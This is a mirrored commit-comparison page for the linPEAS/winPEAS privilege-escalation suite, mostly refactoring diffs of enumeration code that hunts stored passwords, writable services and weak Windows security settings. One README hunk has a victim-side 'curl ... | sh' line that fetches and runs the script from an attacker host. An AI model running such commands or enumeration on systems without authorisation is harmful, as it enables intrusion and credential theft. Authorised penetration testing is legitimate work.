mirror of
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
synced 2025-12-10 18:59:02 +00:00
Compare commits
11 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
ded6f3045f | ||
|
|
d20638fa7b | ||
|
aa69a494b4 | ||
|
|
a4b226c16e | ||
|
3cc49b5b9a | ||
|
|
e5b9b67786 | ||
|
|
e29c9e88d5 | ||
|
|
8b6ce759d0 | ||
|
|
116d842158 | ||
|
46033a7af0 | ||
|
0ab4a65bab |
4
.github/workflows/CI-master_tests.yml
vendored
4
.github/workflows/CI-master_tests.yml
vendored
@@ -1,10 +1,6 @@
|
||||
name: CI-master_test
|
||||
|
||||
on:
|
||||
pull_request:
|
||||
branches:
|
||||
- master
|
||||
|
||||
schedule:
|
||||
- cron: "5 4 * * SUN"
|
||||
|
||||
|
||||
@@ -22,7 +22,7 @@ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas
|
||||
|
||||
```bash
|
||||
# Local network
|
||||
sudo python -m SimpleHTTPServer 80 #Host
|
||||
sudo python -m http.server 80 #Host
|
||||
curl 10.10.10.10/linpeas.sh | sh #Victim
|
||||
|
||||
# Without curl
|
||||
|
||||
@@ -25,7 +25,7 @@ echo ""
|
||||
print_2title "CVEs Check"
|
||||
|
||||
#-- SY) CVE-2021-4034
|
||||
if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1642035600" ]; then
|
||||
if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1641942000" ]; then
|
||||
echo "Vulnerable to CVE-2021-4034" | sed -${E} "s,.*,${SED_RED_YELLOW},"
|
||||
echo ""
|
||||
fi
|
||||
|
||||
@@ -105,7 +105,7 @@ fi
|
||||
echo ""
|
||||
|
||||
#-- UI) Doas
|
||||
if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then
|
||||
if [ "$(command -v doas 2>/dev/null)" ] || [ "$DEBUG" ]; then
|
||||
print_2title "Checking doas.conf"
|
||||
doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null)
|
||||
if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then
|
||||
|
||||
@@ -808,7 +808,7 @@ basic_net_info(){
|
||||
select_nc (){
|
||||
#Select the correct configuration of the netcat found
|
||||
NC_SCAN="$FOUND_NC -v -n -z -w 1"
|
||||
$($FOUND_NC 127.0.0.1 65321 > /dev/null 2>&1)
|
||||
$($NC_SCAN 127.0.0.1 65321 > /dev/null 2>&1)
|
||||
if [ $? -eq 2 ]
|
||||
then
|
||||
NC_SCAN="timeout 1 $FOUND_NC -v -n"
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
using System.Reflection;
|
||||
using System.Runtime.CompilerServices;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
// General Information about an assembly is controlled through the following
|
||||
|
||||
@@ -27,8 +27,8 @@ namespace winPEAS.Checks
|
||||
{
|
||||
Beaprint.MainPrint("Current Active Window Application");
|
||||
string title = ApplicationInfoHelper.GetActiveWindowTitle();
|
||||
List<string> permsFile = PermissionsHelper.GetPermissionsFile(title, winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<string> permsFolder = PermissionsHelper.GetPermissionsFolder(title, winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<string> permsFile = PermissionsHelper.GetPermissionsFile(title, Checks.CurrentUserSiDs);
|
||||
List<string> permsFolder = PermissionsHelper.GetPermissionsFolder(title, Checks.CurrentUserSiDs);
|
||||
if (permsFile.Count > 0)
|
||||
{
|
||||
Beaprint.BadPrint(" " + title);
|
||||
@@ -188,8 +188,8 @@ namespace winPEAS.Checks
|
||||
|
||||
foreach (Dictionary<string, string> sapp in scheduled_apps)
|
||||
{
|
||||
List<string> fileRights = PermissionsHelper.GetPermissionsFile(sapp["Action"], winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<string> dirRights = PermissionsHelper.GetPermissionsFolder(sapp["Action"], winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<string> fileRights = PermissionsHelper.GetPermissionsFile(sapp["Action"], Checks.CurrentUserSiDs);
|
||||
List<string> dirRights = PermissionsHelper.GetPermissionsFolder(sapp["Action"], Checks.CurrentUserSiDs);
|
||||
string formString = " ({0}) {1}: {2}";
|
||||
|
||||
if (fileRights.Count > 0)
|
||||
@@ -238,8 +238,8 @@ namespace winPEAS.Checks
|
||||
foreach (var driver in DeviceDrivers.GetDeviceDriversNoMicrosoft())
|
||||
{
|
||||
string pathDriver = driver.Key;
|
||||
List<string> fileRights = PermissionsHelper.GetPermissionsFile(pathDriver, winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<string> dirRights = PermissionsHelper.GetPermissionsFolder(pathDriver, winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<string> fileRights = PermissionsHelper.GetPermissionsFile(pathDriver, Checks.CurrentUserSiDs);
|
||||
List<string> dirRights = PermissionsHelper.GetPermissionsFolder(pathDriver, Checks.CurrentUserSiDs);
|
||||
|
||||
Dictionary<string, string> colorsD = new Dictionary<string, string>()
|
||||
{
|
||||
|
||||
@@ -363,8 +363,8 @@ namespace winPEAS.Checks
|
||||
try
|
||||
{
|
||||
Beaprint.GrayPrint(" - Creating disabled users list...");
|
||||
Checks.PaintDisabledUsers = string.Join("|", User.GetMachineUsers(false, true, false, false, false));
|
||||
PaintDisabledUsersNoAdministrator = Checks.PaintDisabledUsers.Replace("|Administrator", "").Replace("Administrator|", "").Replace("Administrator", "");
|
||||
PaintDisabledUsers = string.Join("|", User.GetMachineUsers(false, true, false, false, false));
|
||||
PaintDisabledUsersNoAdministrator = PaintDisabledUsers.Replace("|Administrator", "").Replace("Administrator|", "").Replace("Administrator", "");
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
@@ -411,7 +411,7 @@ namespace winPEAS.Checks
|
||||
try
|
||||
{
|
||||
if (RegistryHelper.GetRegValue("HKCU", "CONSOLE", "VirtualTerminalLevel") == "" && RegistryHelper.GetRegValue("HKCU", "CONSOLE", "VirtualTerminalLevel") == "")
|
||||
System.Console.WriteLine(@"ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
|
||||
Console.WriteLine(@"ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
@@ -425,7 +425,7 @@ namespace winPEAS.Checks
|
||||
{
|
||||
if (RegistryHelper.GetRegValue("HKLM", @"SYSTEM\CurrentControlSet\Control\FileSystem", "LongPathsEnabled") != "1")
|
||||
{
|
||||
System.Console.WriteLine(@"Long paths are disabled, so the maximum length of a path supported is 260chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
|
||||
Console.WriteLine(@"Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
|
||||
IsLongPath = false;
|
||||
}
|
||||
else
|
||||
|
||||
@@ -118,7 +118,8 @@ namespace winPEAS.Checks
|
||||
|
||||
if (isFileFound)
|
||||
{
|
||||
if (!somethingFound) {
|
||||
if (!somethingFound)
|
||||
{
|
||||
Beaprint.MainPrint($"Found {searchName} Files");
|
||||
somethingFound = true;
|
||||
}
|
||||
@@ -352,7 +353,7 @@ namespace winPEAS.Checks
|
||||
|
||||
try
|
||||
{
|
||||
string text = System.IO.File.ReadAllText(f.FullPath);
|
||||
string text = File.ReadAllText(f.FullPath);
|
||||
|
||||
results = SearchContent(text, regex.regex, (bool)regex.caseinsensitive);
|
||||
if (results.Count > 0)
|
||||
@@ -460,8 +461,10 @@ namespace winPEAS.Checks
|
||||
|
||||
if (fileSettings.type == "f")
|
||||
{
|
||||
var colors = new Dictionary<string, string>();
|
||||
colors.Add(fileInfo.Filename, Beaprint.ansi_color_bad);
|
||||
var colors = new Dictionary<string, string>
|
||||
{
|
||||
{ fileInfo.Filename, Beaprint.ansi_color_bad }
|
||||
};
|
||||
Beaprint.AnsiPrint($"File: {fileInfo.FullPath}", colors);
|
||||
|
||||
if (!(bool)fileSettings.just_list_file)
|
||||
@@ -471,8 +474,10 @@ namespace winPEAS.Checks
|
||||
}
|
||||
else if (fileSettings.type == "d")
|
||||
{
|
||||
var colors = new Dictionary<string, string>();
|
||||
colors.Add(fileInfo.Filename, Beaprint.ansi_color_bad);
|
||||
var colors = new Dictionary<string, string>
|
||||
{
|
||||
{ fileInfo.Filename, Beaprint.ansi_color_bad }
|
||||
};
|
||||
Beaprint.AnsiPrint($"Folder: {fileInfo.FullPath}", colors);
|
||||
|
||||
// just list the directory
|
||||
|
||||
@@ -159,7 +159,7 @@ namespace winPEAS.Checks
|
||||
{
|
||||
string formString = " {0} ({1})\n Accessed:{2} -- Size:{3}";
|
||||
Beaprint.BadPrint(string.Format(formString, cc["file"], cc["Description"], cc["Accessed"], cc["Size"]));
|
||||
System.Console.WriteLine("");
|
||||
Console.WriteLine("");
|
||||
}
|
||||
}
|
||||
else
|
||||
@@ -182,7 +182,7 @@ namespace winPEAS.Checks
|
||||
{
|
||||
List<string> pwds = Unattended.ExtractUnattendedPwd(path);
|
||||
Beaprint.BadPrint(" " + path);
|
||||
System.Console.WriteLine(string.Join("\n", pwds));
|
||||
Console.WriteLine(string.Join("\n", pwds));
|
||||
}
|
||||
}
|
||||
catch (Exception ex)
|
||||
@@ -480,7 +480,7 @@ namespace winPEAS.Checks
|
||||
if (Regex.Match(rec_file["Name"], pattern.Replace("*", ".*"), RegexOptions.IgnoreCase).Success)
|
||||
{
|
||||
Beaprint.DictPrint(rec_file, colorF, true);
|
||||
System.Console.WriteLine();
|
||||
Console.WriteLine();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -81,7 +81,7 @@ namespace winPEAS.Checks
|
||||
{
|
||||
if (line.Length > 0 && line[0] != '#')
|
||||
{
|
||||
System.Console.WriteLine(" " + line.Replace("\t", " "));
|
||||
Console.WriteLine(" " + line.Replace("\t", " "));
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -304,8 +304,8 @@ namespace winPEAS.Checks
|
||||
Beaprint.GrayPrint(" DENY rules:");
|
||||
foreach (Dictionary<string, string> rule in Firewall.GetFirewallRules())
|
||||
{
|
||||
string filePerms = string.Join(", ", PermissionsHelper.GetPermissionsFile(rule["AppName"], winPEAS.Checks.Checks.CurrentUserSiDs));
|
||||
string folderPerms = string.Join(", ", PermissionsHelper.GetPermissionsFolder(rule["AppName"], winPEAS.Checks.Checks.CurrentUserSiDs));
|
||||
string filePerms = string.Join(", ", PermissionsHelper.GetPermissionsFile(rule["AppName"], Checks.CurrentUserSiDs));
|
||||
string folderPerms = string.Join(", ", PermissionsHelper.GetPermissionsFolder(rule["AppName"], Checks.CurrentUserSiDs));
|
||||
string formString = " ({0}){1}[{2}]: {3} {4} {5} from {6} --> {7}";
|
||||
if (filePerms.Length > 0)
|
||||
formString += "\n File Permissions: {8}";
|
||||
|
||||
@@ -20,7 +20,7 @@ namespace winPEAS.Checks
|
||||
{
|
||||
CheckRunner.Run(() =>
|
||||
{
|
||||
modifiableServices = ServicesInfoHelper.GetModifiableServices(winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
modifiableServices = ServicesInfoHelper.GetModifiableServices(Checks.CurrentUserSiDs);
|
||||
}, isDebug);
|
||||
}
|
||||
catch (Exception ex)
|
||||
@@ -53,12 +53,12 @@ namespace winPEAS.Checks
|
||||
|
||||
foreach (Dictionary<string, string> serviceInfo in services_info)
|
||||
{
|
||||
List<string> fileRights = PermissionsHelper.GetPermissionsFile(serviceInfo["FilteredPath"], winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<string> fileRights = PermissionsHelper.GetPermissionsFile(serviceInfo["FilteredPath"], Checks.CurrentUserSiDs);
|
||||
List<string> dirRights = new List<string>();
|
||||
|
||||
if (serviceInfo["FilteredPath"] != null && serviceInfo["FilteredPath"] != "")
|
||||
{
|
||||
dirRights = PermissionsHelper.GetPermissionsFolder(Path.GetDirectoryName(serviceInfo["FilteredPath"]), winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
dirRights = PermissionsHelper.GetPermissionsFolder(Path.GetDirectoryName(serviceInfo["FilteredPath"]), Checks.CurrentUserSiDs);
|
||||
}
|
||||
|
||||
bool noQuotesAndSpace = MyUtils.CheckQuoteAndSpace(serviceInfo["PathName"]);
|
||||
@@ -159,7 +159,7 @@ namespace winPEAS.Checks
|
||||
{
|
||||
Beaprint.MainPrint("Looking if you can modify any service registry");
|
||||
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services-registry-permissions", "Check if you can modify the registry of a service");
|
||||
List<Dictionary<string, string>> regPerms = ServicesInfoHelper.GetWriteServiceRegs(winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<Dictionary<string, string>> regPerms = ServicesInfoHelper.GetWriteServiceRegs(Checks.CurrentUserSiDs);
|
||||
|
||||
Dictionary<string, string> colorsWR = new Dictionary<string, string>()
|
||||
{
|
||||
|
||||
@@ -5,21 +5,21 @@ using System.Linq;
|
||||
using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text.RegularExpressions;
|
||||
using winPEAS._3rdParty.Watson;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.AppLocker;
|
||||
using winPEAS._3rdParty.Watson;
|
||||
using winPEAS.Info.SystemInfo.Printers;
|
||||
using winPEAS.Info.SystemInfo.NamedPipes;
|
||||
using winPEAS.Info.SystemInfo;
|
||||
using winPEAS.Info.SystemInfo.SysMon;
|
||||
using winPEAS.Helpers.Extensions;
|
||||
using winPEAS.Helpers.Registry;
|
||||
using winPEAS.Info.SystemInfo;
|
||||
using winPEAS.Info.SystemInfo.AuditPolicies;
|
||||
using winPEAS.Info.SystemInfo.DotNet;
|
||||
using winPEAS.Info.SystemInfo.GroupPolicy;
|
||||
using winPEAS.Info.SystemInfo.WindowsDefender;
|
||||
using winPEAS.Info.SystemInfo.PowerShell;
|
||||
using winPEAS.Info.SystemInfo.NamedPipes;
|
||||
using winPEAS.Info.SystemInfo.Ntlm;
|
||||
using winPEAS.Info.SystemInfo.PowerShell;
|
||||
using winPEAS.Info.SystemInfo.Printers;
|
||||
using winPEAS.Info.SystemInfo.SysMon;
|
||||
using winPEAS.Info.SystemInfo.WindowsDefender;
|
||||
using winPEAS.Native.Enums;
|
||||
|
||||
namespace winPEAS.Checks
|
||||
@@ -107,7 +107,7 @@ namespace winPEAS.Checks
|
||||
{ Globals.StrTrue, Beaprint.ansi_color_bad },
|
||||
};
|
||||
Beaprint.DictPrint(basicDictSystem, colorsSI, false);
|
||||
System.Console.WriteLine();
|
||||
Console.WriteLine();
|
||||
Watson.FindVulns();
|
||||
|
||||
//To update Watson, update the CVEs and add the new ones and update the main function so it uses new CVEs (becausfull with the Beaprints inside the FindVulns function)
|
||||
@@ -369,12 +369,12 @@ namespace winPEAS.Checks
|
||||
|
||||
if (lsaCfgFlags == "1")
|
||||
{
|
||||
System.Console.WriteLine(" Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
|
||||
Console.WriteLine(" Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
|
||||
Beaprint.GoodPrint(" CredentialGuard is active with UEFI lock");
|
||||
}
|
||||
else if (lsaCfgFlags == "2")
|
||||
{
|
||||
System.Console.WriteLine(" Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
|
||||
Console.WriteLine(" Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
|
||||
Beaprint.GoodPrint(" CredentialGuard is active without UEFI lock");
|
||||
}
|
||||
else
|
||||
@@ -572,7 +572,7 @@ namespace winPEAS.Checks
|
||||
else if (using_HKLM_WSUS == "0")
|
||||
Beaprint.GoodPrint(" But UseWUServer is equals to 0, so it is not vulnerable!");
|
||||
else
|
||||
System.Console.WriteLine(" But UseWUServer is equals to " + using_HKLM_WSUS + ", so it may work or not");
|
||||
Console.WriteLine(" But UseWUServer is equals to " + using_HKLM_WSUS + ", so it may work or not");
|
||||
}
|
||||
else
|
||||
{
|
||||
@@ -1070,7 +1070,7 @@ namespace winPEAS.Checks
|
||||
}
|
||||
else if (kvp.Value.GetType().IsArray && (kvp.Value.GetType().GetElementType().ToString() == "System.Byte"))
|
||||
{
|
||||
val = System.BitConverter.ToString((byte[])kvp.Value);
|
||||
val = BitConverter.ToString((byte[])kvp.Value);
|
||||
}
|
||||
else
|
||||
{
|
||||
@@ -1086,12 +1086,12 @@ namespace winPEAS.Checks
|
||||
Beaprint.BadPrint(" [!] WDigest is enabled - plaintext password extraction is possible!");
|
||||
}
|
||||
|
||||
if (key.Equals("RunAsPPL", System.StringComparison.InvariantCultureIgnoreCase) && val == "1")
|
||||
if (key.Equals("RunAsPPL", StringComparison.InvariantCultureIgnoreCase) && val == "1")
|
||||
{
|
||||
Beaprint.BadPrint(" [!] LSASS Protected Mode is enabled! You will not be able to access lsass.exe's memory easily.");
|
||||
}
|
||||
|
||||
if (key.Equals("DisableRestrictedAdmin", System.StringComparison.InvariantCultureIgnoreCase) && val == "0")
|
||||
if (key.Equals("DisableRestrictedAdmin", StringComparison.InvariantCultureIgnoreCase) && val == "0")
|
||||
{
|
||||
Beaprint.BadPrint(" [!] RDP Restricted Admin Mode is enabled! You can use pass-the-hash to access RDP on this system.");
|
||||
}
|
||||
|
||||
@@ -1,8 +1,6 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.ComponentModel;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.Cryptography;
|
||||
using System.Security.Principal;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Extensions;
|
||||
@@ -158,7 +156,7 @@ namespace winPEAS.Checks
|
||||
try
|
||||
{
|
||||
Beaprint.MainPrint("RDP Sessions");
|
||||
List<Dictionary<string, string>> rdp_sessions = Info.UserInfo.UserInfoHelper.GetRDPSessions();
|
||||
List<Dictionary<string, string>> rdp_sessions = UserInfoHelper.GetRDPSessions();
|
||||
if (rdp_sessions.Count > 0)
|
||||
{
|
||||
string format = " {0,-10}{1,-15}{2,-15}{3,-25}{4,-10}{5}";
|
||||
@@ -263,7 +261,7 @@ namespace winPEAS.Checks
|
||||
{
|
||||
Beaprint.MainPrint("Password Policies");
|
||||
Beaprint.LinkPrint("", "Check for a possible brute-force");
|
||||
List<Dictionary<string, string>> PPy = Info.UserInfo.UserInfoHelper.GetPasswordPolicy();
|
||||
List<Dictionary<string, string>> PPy = UserInfoHelper.GetPasswordPolicy();
|
||||
Beaprint.DictPrint(PPy, ColorsU(), false);
|
||||
}
|
||||
catch (Exception ex)
|
||||
|
||||
@@ -327,6 +327,8 @@ namespace winPEAS.Helpers.AppLocker
|
||||
if (depth == FolderCheckMaxDepth) return false;
|
||||
|
||||
try
|
||||
{
|
||||
if (Directory.Exists(path))
|
||||
{
|
||||
var subfolders = Directory.EnumerateDirectories(path);
|
||||
var files = Directory.EnumerateFiles(path, "*", SearchOption.TopDirectoryOnly);
|
||||
@@ -363,6 +365,7 @@ namespace winPEAS.Helpers.AppLocker
|
||||
return true;
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (Exception)
|
||||
{
|
||||
}
|
||||
|
||||
@@ -1,7 +1,6 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Text.RegularExpressions;
|
||||
using System.Threading;
|
||||
|
||||
namespace winPEAS.Helpers
|
||||
{
|
||||
|
||||
@@ -4,7 +4,6 @@ using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security;
|
||||
using System.Security.Permissions;
|
||||
using System.Text;
|
||||
using winPEAS.Native;
|
||||
using winPEAS.Native.Enums;
|
||||
|
||||
|
||||
@@ -1,9 +1,9 @@
|
||||
using System;
|
||||
using Microsoft.Win32.SafeHandles;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.ComponentModel;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using Microsoft.Win32.SafeHandles;
|
||||
using winPEAS.Native;
|
||||
|
||||
namespace winPEAS.Helpers.CredentialManager
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
using winPEAS.Native;
|
||||
using winPEAS.Native.Enums;
|
||||
|
||||
|
||||
@@ -1,11 +1,9 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Diagnostics;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.Principal;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.Helpers
|
||||
{
|
||||
@@ -438,9 +436,11 @@ namespace winPEAS.Helpers
|
||||
// Get the owner of a process given the PID
|
||||
public static Dictionary<string, string> GetProcU(Process p)
|
||||
{
|
||||
Dictionary<string, string> data = new Dictionary<string, string>();
|
||||
data["name"] = "";
|
||||
data["sid"] = "";
|
||||
Dictionary<string, string> data = new Dictionary<string, string>
|
||||
{
|
||||
["name"] = "",
|
||||
["sid"] = ""
|
||||
};
|
||||
IntPtr pHandle = IntPtr.Zero;
|
||||
try
|
||||
{
|
||||
@@ -586,7 +586,7 @@ namespace winPEAS.Helpers
|
||||
{ // This shouldn't be needed
|
||||
if (path.StartsWith("\\"))
|
||||
path = path.Substring(1);
|
||||
hive = Helpers.Registry.RegistryHelper.CheckIfExists(path);
|
||||
hive = Registry.RegistryHelper.CheckIfExists(path);
|
||||
}
|
||||
|
||||
if (path.StartsWith("\\"))
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
using System;
|
||||
using System.Diagnostics;
|
||||
using System.Diagnostics;
|
||||
|
||||
namespace winPEAS.Helpers
|
||||
{
|
||||
|
||||
@@ -1,11 +1,11 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Security.AccessControl;
|
||||
using System.Security.Principal;
|
||||
using System.Text.RegularExpressions;
|
||||
using Microsoft.Win32;
|
||||
|
||||
namespace winPEAS.Helpers
|
||||
{
|
||||
@@ -353,6 +353,8 @@ namespace winPEAS.Helpers
|
||||
{
|
||||
results[path] = String.Join(", ", GetPermissionsFolder(path, Checks.Checks.CurrentUserSiDs));
|
||||
if (string.IsNullOrEmpty(results[path]))
|
||||
{
|
||||
if (Directory.Exists(path))
|
||||
{
|
||||
foreach (string d in Directory.EnumerateDirectories(path))
|
||||
{
|
||||
@@ -365,6 +367,7 @@ namespace winPEAS.Helpers
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
catch
|
||||
{
|
||||
//Access denied to a path
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using Microsoft.Win32;
|
||||
|
||||
namespace winPEAS.Helpers.Registry
|
||||
{
|
||||
@@ -177,7 +177,7 @@ namespace winPEAS.Helpers.Registry
|
||||
|
||||
internal static uint? GetDwordValue(string hive, string key, string val)
|
||||
{
|
||||
string strValue = RegistryHelper.GetRegValue(hive, key, val);
|
||||
string strValue = GetRegValue(hive, key, val);
|
||||
|
||||
if (uint.TryParse(strValue, out uint res))
|
||||
{
|
||||
|
||||
@@ -221,43 +221,43 @@ namespace winPEAS.Helpers.Search
|
||||
{
|
||||
// c:\users
|
||||
string rootUsersSearchPath = $"{SystemDrive}\\Users\\";
|
||||
SearchHelper.RootDirUsers = SearchHelper.GetFilesFast(rootUsersSearchPath, GlobalPattern, isFoldersIncluded: true);
|
||||
RootDirUsers = GetFilesFast(rootUsersSearchPath, GlobalPattern, isFoldersIncluded: true);
|
||||
|
||||
// c:\users\current_user
|
||||
string rootCurrentUserSearchPath = Environment.GetEnvironmentVariable("USERPROFILE");
|
||||
SearchHelper.RootDirCurrentUser = SearchHelper.GetFilesFast(rootCurrentUserSearchPath, GlobalPattern, isFoldersIncluded: true);
|
||||
RootDirCurrentUser = GetFilesFast(rootCurrentUserSearchPath, GlobalPattern, isFoldersIncluded: true);
|
||||
|
||||
// c:\Program Files\
|
||||
string rootProgramFiles = $"{SystemDrive}\\Program Files\\";
|
||||
SearchHelper.ProgramFiles = SearchHelper.GetFilesFast(rootProgramFiles, GlobalPattern, isFoldersIncluded: true);
|
||||
ProgramFiles = GetFilesFast(rootProgramFiles, GlobalPattern, isFoldersIncluded: true);
|
||||
|
||||
// c:\Program Files (x86)\
|
||||
string rootProgramFilesX86 = $"{SystemDrive}\\Program Files (x86)\\";
|
||||
SearchHelper.ProgramFilesX86 = SearchHelper.GetFilesFast(rootProgramFilesX86, GlobalPattern, isFoldersIncluded: true);
|
||||
ProgramFilesX86 = GetFilesFast(rootProgramFilesX86, GlobalPattern, isFoldersIncluded: true);
|
||||
|
||||
// c:\Documents and Settings\
|
||||
string documentsAndSettings = $"{SystemDrive}\\Documents and Settings\\";
|
||||
SearchHelper.DocumentsAndSettings = SearchHelper.GetFilesFast(documentsAndSettings, GlobalPattern, isFoldersIncluded: true);
|
||||
DocumentsAndSettings = GetFilesFast(documentsAndSettings, GlobalPattern, isFoldersIncluded: true);
|
||||
|
||||
// c:\ProgramData\Microsoft\Group Policy\History
|
||||
string groupPolicyHistory = $"{SystemDrive}\\ProgramData\\Microsoft\\Group Policy\\History";
|
||||
SearchHelper.GroupPolicyHistory = SearchHelper.GetFilesFast(groupPolicyHistory, GlobalPattern, isFoldersIncluded: true);
|
||||
GroupPolicyHistory = GetFilesFast(groupPolicyHistory, GlobalPattern, isFoldersIncluded: true);
|
||||
|
||||
// c:\Documents and Settings\All Users\Application Data\\Microsoft\\Group Policy\\History
|
||||
string groupPolicyHistoryLegacy = $"{documentsAndSettings}\\All Users\\Application Data\\Microsoft\\Group Policy\\History";
|
||||
//SearchHelper.GroupPolicyHistoryLegacy = SearchHelper.GetFilesFast(groupPolicyHistoryLegacy, globalPattern);
|
||||
var groupPolicyHistoryLegacyFiles = SearchHelper.GetFilesFast(groupPolicyHistoryLegacy, GlobalPattern, isFoldersIncluded: true);
|
||||
SearchHelper.GroupPolicyHistory.AddRange(groupPolicyHistoryLegacyFiles);
|
||||
var groupPolicyHistoryLegacyFiles = GetFilesFast(groupPolicyHistoryLegacy, GlobalPattern, isFoldersIncluded: true);
|
||||
GroupPolicyHistory.AddRange(groupPolicyHistoryLegacyFiles);
|
||||
}
|
||||
|
||||
internal static void CleanLists()
|
||||
{
|
||||
SearchHelper.RootDirUsers = null;
|
||||
SearchHelper.RootDirCurrentUser = null;
|
||||
SearchHelper.ProgramFiles = null;
|
||||
SearchHelper.ProgramFilesX86 = null;
|
||||
SearchHelper.DocumentsAndSettings = null;
|
||||
SearchHelper.GroupPolicyHistory = null;
|
||||
RootDirUsers = null;
|
||||
RootDirCurrentUser = null;
|
||||
ProgramFiles = null;
|
||||
ProgramFilesX86 = null;
|
||||
DocumentsAndSettings = null;
|
||||
GroupPolicyHistory = null;
|
||||
|
||||
GC.Collect();
|
||||
}
|
||||
@@ -270,7 +270,7 @@ namespace winPEAS.Helpers.Search
|
||||
".*password.*"
|
||||
};
|
||||
|
||||
foreach (var file in SearchHelper.RootDirUsers)
|
||||
foreach (var file in RootDirUsers)
|
||||
{
|
||||
//string extLower = file.Extension.ToLower();
|
||||
|
||||
@@ -297,7 +297,7 @@ namespace winPEAS.Helpers.Search
|
||||
{
|
||||
var result = new List<string>();
|
||||
|
||||
foreach (var file in SearchHelper.RootDirCurrentUser)
|
||||
foreach (var file in RootDirCurrentUser)
|
||||
{
|
||||
if (!file.IsDirectory)
|
||||
{
|
||||
@@ -337,7 +337,7 @@ namespace winPEAS.Helpers.Search
|
||||
".xml"
|
||||
};
|
||||
|
||||
foreach (var file in SearchHelper.GroupPolicyHistory)
|
||||
foreach (var file in GroupPolicyHistory)
|
||||
{
|
||||
if (!file.IsDirectory)
|
||||
{
|
||||
@@ -361,14 +361,14 @@ namespace winPEAS.Helpers.Search
|
||||
};
|
||||
|
||||
string programDataPath = $"{SystemDrive}\\ProgramData\\";
|
||||
var programData = SearchHelper.GetFilesFast(programDataPath, GlobalPattern);
|
||||
var programData = GetFilesFast(programDataPath, GlobalPattern);
|
||||
|
||||
var searchFiles = new List<CustomFileInfo>();
|
||||
searchFiles.AddRange(SearchHelper.ProgramFiles);
|
||||
searchFiles.AddRange(SearchHelper.ProgramFilesX86);
|
||||
searchFiles.AddRange(ProgramFiles);
|
||||
searchFiles.AddRange(ProgramFilesX86);
|
||||
searchFiles.AddRange(programData);
|
||||
searchFiles.AddRange(SearchHelper.DocumentsAndSettings);
|
||||
searchFiles.AddRange(SearchHelper.RootDirUsers);
|
||||
searchFiles.AddRange(DocumentsAndSettings);
|
||||
searchFiles.AddRange(RootDirUsers);
|
||||
|
